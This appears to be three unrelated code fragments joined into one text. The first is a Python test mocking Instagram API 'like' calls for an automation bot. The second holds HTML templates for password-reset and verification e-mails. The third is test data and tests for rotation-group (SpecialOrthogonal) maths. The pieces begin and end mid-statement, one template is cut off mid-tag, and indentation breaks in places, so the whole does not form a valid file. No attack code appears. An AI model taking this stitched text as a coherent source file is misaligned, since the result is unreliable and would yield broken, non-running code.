    # the like endpoint itself
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=my_test_photo_item["id"]
        ),
        status=200,
        json={"status": "ok"},
    )
    self.bot.like_followers(username)
    assert self.bot.total["likes"] == \
        liked_at_start + results_3 * results_4
@responses.activate
@pytest.mark.parametrize("username", ["1234567890", 1234567890])
@patch("time.sleep", return_value=None)
def test_like_following(self, patched_time_sleep, username):
liked_at_start = self.bot.total["likes"]
test_username = "test.username"
response_data_1 = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=test_username
),
status=200,
json=response_data_1,
)
response_data_2 = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data_2,
)
results_3 = 5
response_data_3 = {
"status": "ok",
"big_list": False,
"next_max_id": None,
"sections": None,
"users": [TEST_FOLLOWING_ITEM for _ in range(results_3)],
}
responses.add(
responses.GET,
(
"{api_url}friendships/{user_id}/following/?max_id={max_id}" +
"&ig_sig_key_version={sig_key}&rank_token={rank_token}"
).format(
api_url=API_URL,
user_id=username,
rank_token=self.bot.api.rank_token,
sig_key=SIG_KEY_VERSION,
max_id="",
),
json=response_data_3,
status=200,
)
self.bot._following = [1]
TEST_USERNAME_INFO_ITEM["biography"] = "instabot"
my_test_photo_item = TEST_PHOTO_ITEM.copy()
my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
my_test_photo_item["has_liked"] = False
response_data = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
results_4 = 3
response_data = {
"auto_load_more_enabled": True,
"num_results": results_4,
"status": "ok",
"more_available": False,
"items": [my_test_photo_item for _ in range(results_4)],
}
responses.add(
| |
# <gh_stars>0
# Two-part HTML template for the "forgot password" e-mail.
# file_forgot_password[0] ends just inside the fallback link's <a> tag and
# file_forgot_password[1] closes it, so the reset URL is rendered between the
# two halves -- presumably via concatenation/join at send time; TODO confirm
# against the caller.
# NOTE(review): percent signs are doubled ('100%%') throughout, which suggests
# the template is passed through printf-style '%' formatting -- verify before
# de-escaping. The literal href="secret_key" on the button looks like a
# placeholder token substituted with the real reset link; confirm.
# Fix applied: missing space in the sign-off ("Cheers,BBB Team").
file_forgot_password = ["""<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<style type="text/css">
@media screen {
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 400;
src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 700;
src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 400;
src: local('Lato Italic'), local('Lato-Italic'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 700;
src: local('Lato Bold Italic'), local('Lato-BoldItalic'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format('woff');
}
}
/* CLIENT-SPECIFIC STYLES */
body,
table,
td,
a {
-webkit-text-size-adjust: 100%%;
-ms-text-size-adjust: 100%%;
}
table,
td {
mso-table-lspace: 0pt;
mso-table-rspace: 0pt;
}
img {
-ms-interpolation-mode: bicubic;
}
/* RESET STYLES */
img {
border: 0;
height: auto;
line-height: 100%%;
outline: none;
text-decoration: none;
}
table {
border-collapse: collapse !important;
}
body {
height: 100%% !important;
margin: 0 !important;
padding: 0 !important;
width: 100%% !important;
}
/* iOS BLUE LINKS */
a[x-apple-data-detectors] {
color: inherit !important;
text-decoration: none !important;
font-size: inherit !important;
font-family: inherit !important;
font-weight: inherit !important;
line-height: inherit !important;
}
/* MOBILE STYLES */
@media screen and (max-width:600px) {
h1 {
font-size: 32px !important;
line-height: 32px !important;
}
}
/* ANDROID CENTER FIX */
div[style*="margin: 16px 0;"] {
margin: 0 !important;
}
</style>
</head>
<body style="background-color: #f4f4f4; margin: 0 !important; padding: 0 !important;">
<!-- HIDDEN PREHEADER TEXT -->
<div style="display: none; font-size: 1px; color: #fefefe; line-height: 1px; font-family: 'Lato', Helvetica, Arial, sans-serif; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;"> We're thrilled to have you here! Get ready to dive into your new account. </div>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<!-- LOGO -->
<tr>
<td bgcolor="#FFA73B" align="center">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td align="center" valign="top" style="padding: 40px 10px 40px 10px;"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFA73B" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="center" valign="top" style="padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;">
<h1 style="font-size: 48px; font-weight: 400; margin: 2;">Welcome!</h1> <img src=" https://img.icons8.com/clouds/100/000000/handshake.png" width="125" height="120" style="display: block; border: 0px;" />
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 40px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">We're excited to have you get started. First, you need to confirm your account. Just press the button below.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left">
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#ffffff" align="center" style="padding: 20px 30px 60px 30px;">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="border-radius: 3px;" bgcolor="#FFA73B"><a href="secret_key" target="_blank" style="font-size: 20px; font-family: Helvetica, Arial, sans-serif; color: #ffffff; text-decoration: none; color: #ffffff; text-decoration: none; padding: 15px 25px; border-radius: 2px; border: 1px solid #FFA73B; display: inline-block;">Reset Password</a></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 0px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">If that doesn't work, copy and paste the following link in your browser:</p>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 20px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;"><a href="#" target="_blank" style="color: #FFA73B;">""","""</a></p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 20px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">If you have any questions, just reply to this email—we're always happy to help out.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 40px 30px; border-radius: 0px 0px 4px 4px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">Cheers, BBB Team</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 30px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#FFECD1" align="center" style="padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<h2 style="font-size: 20px; font-weight: 400; color: #111111; margin: 0;">Need more help?</h2>
<p style="margin: 0;"><a href="#" target="_blank" style="color: #FFA73B;">We’re here to help you out</a></p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#f4f4f4" align="left" style="padding: 0px 30px 30px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 14px; font-weight: 400; line-height: 18px;">
<p style="margin: 0;">If these emails get annoying, please feel free to <a href="#" target="_blank" style="color: #111111; font-weight: 700;">unsubscribe</a>.</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
"""]
file_verification_email = ["""<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<style type="text/css">
@media screen {
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 400;
src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 700;
src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 400;
src: local('Lato Italic'), local('Lato-Italic'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 700;
src: local('Lato Bold Italic'), local('Lato-BoldItalic'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format('woff');
}
}
/* CLIENT-SPECIFIC STYLES */
body,
table,
td,
a {
-webkit-text-size-adjust: 100%%;
-ms-text-size-adjust: 100%%;
}
table,
td {
mso-table-lspace: 0pt;
mso-table-rspace: 0pt;
}
img {
-ms-interpolation-mode: bicubic;
}
/* RESET STYLES */
img {
border: 0;
height: auto;
line-height: 100%%;
outline: none;
text-decoration: none;
}
table {
border-collapse: collapse !important;
}
body {
height: 100%% !important;
margin: 0 !important;
padding: 0 !important;
width: 100%% !important;
}
/* iOS BLUE LINKS */
a[x-apple-data-detectors] {
color: inherit !important;
text-decoration: none !important;
font-size: inherit !important;
font-family: inherit !important;
font-weight: inherit !important;
line-height: inherit !important;
}
/* MOBILE STYLES */
@media screen and (max-width:600px) {
h1 {
font-size: 32px !important;
line-height: 32px !important;
}
}
/* ANDROID CENTER FIX */
div[style*="margin: 16px 0;"] {
margin: 0 !important;
}
</style>
</head>
<body style="background-color: #f4f4f4; margin: 0 !important; padding: 0 !important;">
<!-- HIDDEN PREHEADER TEXT -->
<div style="display: none; font-size: 1px; color: #fefefe; line-height: 1px; font-family: 'Lato', Helvetica, Arial, sans-serif; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;"> We're thrilled to have you here! Get ready to dive into your new account. </div>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<!-- LOGO -->
<tr>
<td bgcolor="#FFA73B" align="center">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td align="center" valign="top" style="padding: 40px 10px 40px 10px;"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFA73B" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="center" valign="top" style="padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;">
<h1 style="font-size: 48px; font-weight: 400; margin: 2;">Welcome!</h1> <img src=" https://img.icons8.com/clouds/100/000000/handshake.png" width="125" height="120" style="display: block; border: 0px;" />
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 40px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">We're excited to have you get started. First, you need to confirm your account. Just press the button below.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left">
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#ffffff" align="center" style="padding: 20px 30px 60px 30px;">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="border-radius: 3px;" bgcolor="#FFA73B"><a href="secret_key" target="_blank" style="font-size: 20px; font-family: Helvetica, Arial, sans-serif; color: #ffffff; text-decoration: none; color: #ffffff; text-decoration: none; padding: 15px 25px; border-radius: 2px; border: 1px solid #FFA73B; display: inline-block;">Confirm Email</a></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 0px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: | |
self.space(n)
self.assertAllClose(
group.is_tangent(gs.array(vec), base_point), gs.array(expected)
)
def test_skew_to_vector_and_vector_to_skew(self, n, point_type, vec):
    """A vector round-trips through its skew-symmetric matrix form."""
    so_group = self.space(n, point_type)
    skew = so_group.skew_matrix_from_vector(gs.array(vec))
    self.assertAllClose(so_group.vector_from_skew_matrix(skew), vec)
def test_are_antipodals(self, n, mat1, mat2, expected):
    """Antipodal detection for a pair of rotation matrices matches `expected`."""
    result = self.space(n).are_antipodals(mat1, mat2)
    self.assertAllClose(result, gs.array(expected))
def test_log_at_antipodals_value_error(self, n, point, base_point, expected):
    """`log` between antipodal points raises; `expected` is the raises-context."""
    so_group = self.space(n)
    with expected:
        so_group.log(point, base_point)
def test_from_vector_from_matrix(self, n, n_samples):
    """Random rotation vectors round-trip through matrix form (up to regularization)."""
    mat_group = self.space(n)
    vec_group = self.space(n, point_type="vector")
    rot_vecs = vec_group.random_point(n_samples)
    recovered = mat_group.rotation_vector_from_matrix(
        mat_group.matrix_from_rotation_vector(rot_vecs)
    )
    self.assertAllClose(recovered, mat_group.regularize(rot_vecs))
def test_rotation_vector_from_matrix(self, n, point_type, point, expected):
    """Matrix -> rotation-vector conversion matches `expected`."""
    converted = self.space(n, point_type).rotation_vector_from_matrix(gs.array(point))
    self.assertAllClose(converted, gs.array(expected))
def test_projection(self, n, point_type, mat, expected):
    """Projection of a general matrix onto the group matches `expected`."""
    so_group = self.space(n=n, point_type=point_type)
    self.assertAllClose(so_group.projection(mat), expected)
def test_projection_shape(self, n, point_type, n_samples, expected):
    """Projecting a batch of random points yields the expected shape."""
    so_group = self.space(n=n, point_type=point_type)
    projected = so_group.projection(so_group.random_point(n_samples))
    self.assertAllClose(gs.shape(projected), expected)
def test_skew_matrix_from_vector(self, n, vec, expected):
    """Vector -> skew-symmetric-matrix conversion matches `expected`."""
    vec_group = self.space(n=n, point_type="vector")
    self.assertAllClose(vec_group.skew_matrix_from_vector(gs.array(vec)), expected)
def test_rotation_vector_rotation_matrix_regularize(self, n, point):
    """Regularization agrees with a matrix round trip of the rotation vector."""
    so_group = SpecialOrthogonal(n=n)
    round_trip = so_group.rotation_vector_from_matrix(
        so_group.matrix_from_rotation_vector(gs.array(point))
    )
    self.assertAllClose(so_group.regularize(gs.array(point)), round_trip)
def test_matrix_from_rotation_vector(self, n, rot_vec, expected):
    """Rotation-vector -> matrix conversion matches `expected`."""
    self.assertAllClose(
        SpecialOrthogonal(n).matrix_from_rotation_vector(rot_vec), expected
    )
def test_compose_with_inverse_is_identity(self, space_args):
    """Composing a random element with its inverse gives the identity."""
    so_group = SpecialOrthogonal(*space_args)
    elem = gs.squeeze(so_group.random_point())
    self.assertAllClose(
        so_group.compose(elem, so_group.inverse(elem)), so_group.identity
    )
def test_compose(self, n, point_type, point_a, point_b, expected):
    """Group composition of two given points matches `expected`."""
    so_group = SpecialOrthogonal(n, point_type)
    self.assertAllClose(so_group.compose(point_a, point_b), expected)
def test_regularize(self, n, point_type, angle, expected):
    """Regularization of `angle` matches `expected`."""
    regularized = SpecialOrthogonal(n, point_type).regularize(angle)
    self.assertAllClose(regularized, expected)
def test_exp(self, n, point_type, tangent_vec, base_point, expected):
    """Group exponential of `tangent_vec` at `base_point` matches `expected`."""
    so_group = self.space(n, point_type)
    self.assertAllClose(so_group.exp(tangent_vec, base_point), expected)
def test_log(self, n, point_type, point, base_point, expected):
    """Group logarithm of `point` at `base_point` matches `expected`."""
    so_group = self.space(n, point_type)
    self.assertAllClose(so_group.log(point=point, base_point=base_point), expected)
def test_compose_shape(self, n, point_type, n_samples):
    """Composition broadcasts between single points and batches, keeping batch shape."""
    so_group = self.space(n, point_type=point_type)
    batch_a = so_group.random_uniform(n_samples=n_samples)
    batch_b = so_group.random_uniform(n_samples=n_samples)
    single = so_group.random_uniform(n_samples=1)
    expected_shape = (n_samples,) + so_group.shape
    # Same three pairings as before: single*batch, batch*single, batch*batch.
    for left, right in ((single, batch_a), (batch_a, single), (batch_a, batch_b)):
        self.assertAllClose(gs.shape(so_group.compose(left, right)), expected_shape)
def test_rotation_vector_and_rotation_matrix(self, n, point_type, rot_vec):
    """A rotation vector round-trips through matrix form up to regularization."""
    so_group = self.space(n, point_type=point_type)
    recovered = so_group.rotation_vector_from_matrix(
        so_group.matrix_from_rotation_vector(rot_vec)
    )
    self.assertAllClose(recovered, so_group.regularize(rot_vec))
class TestSpecialOrthogonal3Vectors(TestCase, metaclass=Parametrizer):
space = group = SpecialOrthogonal
class SpecialOrthogonal3TestData(TestData):
    """Parametrized test data for SO(3) in rotation-vector representation.

    NOTE(review): relies on module-level fixtures defined elsewhere in this
    file (`coords`, `orders`, `elements`, `elements_all`,
    `angles_close_to_pi`, `angle_pi_6`, `cos_angle_pi_6`, `sin_angle_pi_6`,
    `cos_angle_pi_12`, `sin_angle_pi_12`).
    """

    def tait_bryan_angles_matrix_test_data(self):
        """(coord, order, angle-vector, rotation-matrix) cases for each convention."""
        # Three elementary pi/6 rotations: about the z-, y- and x-axis
        # respectively (visible from the cos/sin placement in each matrix).
        xyz = gs.array(
            [
                [
                    [cos_angle_pi_6, -sin_angle_pi_6, 0.0],
                    [sin_angle_pi_6, cos_angle_pi_6, 0.0],
                    [0.0, 0.0, 1.0],
                ],
                [
                    [cos_angle_pi_6, 0.0, sin_angle_pi_6],
                    [0.0, 1.0, 0.0],
                    [-sin_angle_pi_6, 0.0, cos_angle_pi_6],
                ],
                [
                    [1.0, 0.0, 0.0],
                    [0.0, cos_angle_pi_6, -sin_angle_pi_6],
                    [0.0, sin_angle_pi_6, cos_angle_pi_6],
                ],
            ]
        )
        # The "zyx" order is the "xyz" data reversed.
        zyx = gs.flip(xyz, axis=0)
        data = {"xyz": xyz, "zyx": zyx}
        smoke_data = []
        for coord, order in itertools.product(coords, orders):
            for i in range(3):
                # Angle vector with angle_pi_6 in component i, zeros elsewhere.
                vec = gs.squeeze(
                    gs.array_from_sparse([(0, i)], [angle_pi_6], (1, 3))
                )
                smoke_data += [
                    dict(coord=coord, order=order, vec=vec, mat=data[order][i])
                ]
            # Zero angles must map to the identity matrix.
            smoke_data += [
                dict(coord=coord, order=order, vec=gs.zeros(3), mat=gs.eye(3))
            ]
        return self.generate_tests(smoke_data)

    def tait_bryan_angles_quaternion_test_data(self):
        """(coord, order, angle-vector, quaternion) cases for each convention."""
        # Unit quaternions for half-angle pi/12, i.e. rotations by pi/6.
        xyz = gs.array(
            [
                [cos_angle_pi_12, 0.0, 0.0, sin_angle_pi_12],
                [cos_angle_pi_12, 0.0, sin_angle_pi_12, 0.0],
                [cos_angle_pi_12, sin_angle_pi_12, 0.0, 0.0],
            ]
        )
        zyx = gs.flip(xyz, axis=0)
        data = {"xyz": xyz, "zyx": zyx}
        smoke_data = []
        # Identity quaternion, expected for the zero angle vector.
        e1 = gs.array([1.0, 0.0, 0.0, 0.0])
        # NOTE(review): hard-codes the coord list here instead of reusing the
        # module-level `coords` used above -- presumably identical; confirm.
        for coord, order in itertools.product(["intrinsic", "extrinsic"], orders):
            for i in range(3):
                vec = gs.squeeze(
                    gs.array_from_sparse([(0, i)], [angle_pi_6], (1, 3))
                )
                smoke_data += [
                    dict(coord=coord, order=order, vec=vec, quat=data[order][i])
                ]
            smoke_data += [dict(coord=coord, order=order, vec=gs.zeros(3), quat=e1)]
        return self.generate_tests(smoke_data)

    def quaternion_from_rotation_vector_tait_bryan_angles_test_data(self):
        """All elements except the near-pi ones, over every coord/order pair."""
        smoke_data = []
        for coord, order in itertools.product(coords, orders):
            for angle_type in elements:
                point = elements[angle_type]
                # Near-pi angles are excluded: the conversion is ambiguous there.
                if angle_type not in angles_close_to_pi:
                    smoke_data += [dict(coord=coord, order=order, point=point)]
        return self.generate_tests(smoke_data)

    def tait_bryan_angles_rotation_vector_test_data(self):
        """Same case selection as the quaternion variant above (duplicated body)."""
        smoke_data = []
        for coord, order in itertools.product(coords, orders):
            for angle_type in elements:
                point = elements[angle_type]
                if angle_type not in angles_close_to_pi:
                    smoke_data += [dict(coord=coord, order=order, point=point)]
        return self.generate_tests(smoke_data)

    def quaternion_and_rotation_vector_with_angles_close_to_pi_test_data(self):
        """Only the elements whose rotation angle is close to pi."""
        smoke_data = []
        angle_types = angles_close_to_pi
        for angle_type in angle_types:
            point = elements_all[angle_type]
            smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def quaternion_and_matrix_with_angles_close_to_pi_test_data(self):
        """Only the elements whose rotation angle is close to pi."""
        smoke_data = []
        angle_types = angles_close_to_pi
        for angle_type in angle_types:
            point = elements_all[angle_type]
            smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def rotation_vector_and_rotation_matrix_with_angles_close_to_pi_test_data(self):
        """Only the elements whose rotation angle is close to pi."""
        smoke_data = []
        angle_types = angles_close_to_pi
        for angle_type in angle_types:
            point = elements_all[angle_type]
            smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def lie_bracket_test_data(self):
        """Hand-computed brackets: parallel vectors, basis vectors, and a batch."""
        group = SpecialOrthogonal(3, point_type="vector")
        smoke_data = [
            # Bracket of a vector with itself vanishes.
            dict(
                tangent_vec_a=gs.array([0.0, 0.0, -1.0]),
                tangent_vec_b=gs.array([0.0, 0.0, -1.0]),
                base_point=group.identity,
                expected=gs.zeros(3),
            ),
            # [e_z, e_y] = -e_x for this convention.
            dict(
                tangent_vec_a=gs.array([0.0, 0.0, 1.0]),
                tangent_vec_b=gs.array([0.0, 1.0, 0.0]),
                base_point=group.identity,
                expected=gs.array([-1.0, 0.0, 0.0]),
            ),
            # Batched version of the two cases above.
            dict(
                tangent_vec_a=gs.array([[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]]),
                tangent_vec_b=gs.array([[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]]),
                base_point=gs.array([group.identity, group.identity]),
                expected=gs.array([gs.zeros(3), gs.array([-1.0, 0.0, 0.0])]),
            ),
        ]
        return self.generate_tests(smoke_data)

    def group_exp_after_log_with_angles_close_to_pi_test_data(self):
        """Near-pi points paired with every element value as base point."""
        smoke_data = []
        for angle_type in angles_close_to_pi:
            # NOTE(review): iterates element *values* and uses them directly
            # as base points, despite the name `angle_type_base`.
            for angle_type_base in elements.values():
                smoke_data += [
                    dict(
                        point=elements[angle_type],
                        base_point=angle_type_base,
                    )
                ]
        return self.generate_tests(smoke_data)

    def group_log_after_exp_with_angles_close_to_pi_test_data(self):
        """Same pairs as the exp-after-log variant."""
        return self.group_exp_after_log_with_angles_close_to_pi_test_data()

    def left_jacobian_vectorization_test_data(self):
        """Single vectorization case with a batch of 3 samples."""
        smoke_data = [dict(n_samples=3)]
        return self.generate_tests(smoke_data)

    def left_jacobian_through_its_determinant_test_data(self):
        """Expected Jacobian determinants: Taylor expansion near 0/2pi, closed form elsewhere."""
        smoke_data = []
        for angle_type in elements:
            point = elements[angle_type]
            angle = gs.linalg.norm(SpecialOrthogonal(3, "vector").regularize(point))
            if angle_type in [
                "angle_0",
                "angle_close_0",
                "angle_2pi",
                "angle_close_2pi_high",
            ]:
                # Series expansion, stable where sin(angle/2) ~ 0.
                expected = 1.0 + angle**2 / 12.0 + angle**4 / 240.0
            else:
                expected = angle**2 / (4 * gs.sin(angle / 2) ** 2)
            smoke_data += [dict(point=point, expected=expected)]
        return self.generate_tests(smoke_data)

    def inverse_test_data(self):
        """Single case with a batch of 3 samples."""
        smoke_data = [dict(n_samples=3)]
        return self.generate_tests(smoke_data)

    def compose_and_inverse_test_data(self):
        """Every element value as a standalone case."""
        smoke_data = []
        for point in elements.values():
            smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def compose_regularize_test_data(self):
        """Elements away from angle pi."""
        smoke_data = []
        for element_type in elements:
            point = elements[element_type]
            if element_type not in angles_close_to_pi:
                smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def compose_regularize_angles_close_to_pi_test_data(self):
        """Complement of the previous selection: only near-pi elements."""
        smoke_data = []
        for element_type in elements:
            point = elements[element_type]
            if element_type in angles_close_to_pi:
                smoke_data += [dict(point=point)]
        return self.generate_tests(smoke_data)

    def regularize_extreme_cases_test_data(self):
        """Expected regularizations at and around the 0, pi and 2pi boundaries."""
        smoke_data = []
        # These angles are already in the regular range: identity expected.
        for angle_type in [
            "angle_close_0",
            "angle_close_pi_low",
            "angle_pi",
            "angle_0",
        ]:
            smoke_data += [
                dict(
                    point=elements_all[angle_type],
                    expected=elements_all[angle_type],
                )
            ]
        # Just above pi: wraps to the antipodal representative.
        point = elements_all["angle_close_pi_high"]
        norm = gs.linalg.norm(point)
        smoke_data += [
            dict(point=point, expected=point / norm * (norm - 2 * gs.pi))
        ]
        # Between pi and 2pi: reflected through pi with flipped direction.
        for angle_type in ["angle_in_pi_2pi", "angle_close_2pi_low"]:
            point = elements_all[angle_type]
            angle = gs.linalg.norm(point)
            new_angle = gs.pi - (angle - gs.pi)
            point_initial = point
            expected = -(new_angle / angle) * point_initial
            smoke_data += [dict(point=point, expected=expected)]
        # Exactly 2pi: regularizes to the zero vector.
        smoke_data += [
            dict(
                point=elements_all["angle_2pi"],
                expected=gs.array([0.0, 0.0, 0.0]),
            )
        ]
        # Just above 2pi: wraps by subtracting a full turn.
        point = elements_all["angle_close_2pi_high"]
        angle = gs.linalg.norm(point)
        new_angle = angle - 2 * gs.pi
        expected = new_angle * point / angle
        smoke_data += [dict(point=point, expected=expected)]
        return self.generate_tests(smoke_data)

    def regularize_test_data(self):
        """A batch of four vectors slightly past pi with the expected regularization."""
        point = (gs.pi + 1e-6) * gs.array(
            [[1.0, 0.0, 0.0], [2, 0.5, 0.0], [0.0, 0.0, 0.0], [0.5, 0.0, 0.0]]
        )
        # Second row regularized by hand: antipodal representative of a norm > pi.
        expected_2 = (
            point[1]
            / gs.linalg.norm(point[1])
            * (gs.linalg.norm(point[1]) - 2 * gs.pi)
        )
        expected = gs.array(
            [
                [-(gs.pi - 1e-7), 0.0, 0.0],
                expected_2,
                [0.0, 0.0, 0.0],
                [(gs.pi + 1e-7) / 2.0, 0.0, 0.0],
            ]
        )
        smoke_data = [dict(point=point, expected=expected)]
        return self.generate_tests(smoke_data)
testing_data = SpecialOrthogonal3TestData()
def test_tait_bryan_angles_matrix(self, coord, order, vec, mat):
    """Tait-Bryan angles and rotation matrices convert both ways consistently."""
    so3 = self.space(3, point_type="vector")
    self.assertAllClose(so3.matrix_from_tait_bryan_angles(vec, coord, order), mat)
    self.assertAllClose(so3.tait_bryan_angles_from_matrix(mat, coord, order), vec)
def test_tait_bryan_angles_quaternion(self, coord, order, vec, quat):
    """Tait-Bryan angles and quaternions convert both ways consistently."""
    so3 = self.space(3, point_type="vector")
